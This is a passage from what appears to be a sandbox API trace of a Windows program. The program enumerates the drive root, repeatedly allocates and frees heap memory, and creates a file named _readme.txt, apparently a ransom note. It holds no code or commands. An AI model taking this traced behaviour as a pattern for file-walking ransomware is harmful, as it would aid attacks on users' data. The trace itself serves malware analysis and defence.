hHeap=0x620000) returned 1 [0183.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83778 | out: hHeap=0x620000) returned 1 [0183.379] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0183.379] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x95957a00, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95957a00, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95957a00, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0183.379] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0183.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0183.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0183.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0183.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0183.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83778 [0183.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0183.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cfe140 | out: hHeap=0x620000) returned 1 [0183.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0183.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0183.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0183.381] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa384ad20, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa384ad20, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xc804cea0, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0183.381] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xb883f1e0, ftCreationTime.dwHighDateTime=0x1d8a6e8, ftLastAccessTime.dwLowDateTime=0xb883f1e0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xb883f1e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0183.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0183.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0183.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0183.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0183.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83778 | out: hHeap=0x620000) returned 1 [0183.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0183.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0183.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83778 [0183.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.383] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa37fea60, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa37fea60, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xc781e300, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0183.383] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0183.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0183.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0183.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0183.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83818 [0183.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0183.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0183.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83778 | out: hHeap=0x620000) returned 1 [0183.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0183.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83778 [0183.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.386] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9efab1d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9efab1d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0183.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0183.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0183.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0183.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0183.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0183.387] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1434c8c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1434c8c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0183.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0183.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0183.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2c73318 [0183.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0183.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0183.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0183.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0183.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83818 | out: hHeap=0x620000) returned 1 [0183.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83778 | out: hHeap=0x620000) returned 1 [0183.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0183.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0183.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0183.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0183.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0183.390] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1f2b3de0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1f2b3de0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0183.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83778 [0183.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83818 [0183.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83818 | out: hHeap=0x620000) returned 1 [0183.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83778 | out: hHeap=0x620000) returned 1 [0183.391] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7844bbf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x78471d50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x78471d50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0183.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83778 [0183.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83818 [0183.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83840 [0183.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83818 | out: hHeap=0x620000) returned 1 [0183.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83778 | out: hHeap=0x620000) returned 1 [0183.392] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xa3740380, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xbd8bb9c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbd8bb9c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x2c7a838 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83778 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83818 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83868 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83890 [0183.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0183.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0183.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0183.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83840 | out: hHeap=0x620000) returned 1 [0183.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0183.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0183.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0183.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0183.395] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98a68680, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0x98a68680, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x98a68680, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0183.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83840 [0183.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83840 | out: hHeap=0x620000) returned 1 [0183.396] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0183.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83840 [0183.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83840 | out: hHeap=0x620000) returned 1 [0183.397] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9f317170, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9f317170, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0183.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83840 [0183.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83840 | out: hHeap=0x620000) returned 1 [0183.398] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xd95731c0, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0xd95731c0, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xd95731c0, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0183.398] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xd95731c0, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0xd95731c0, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xd95731c0, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0183.398] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0183.399] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.408] HeapFree (in: hHeap=0x620000, 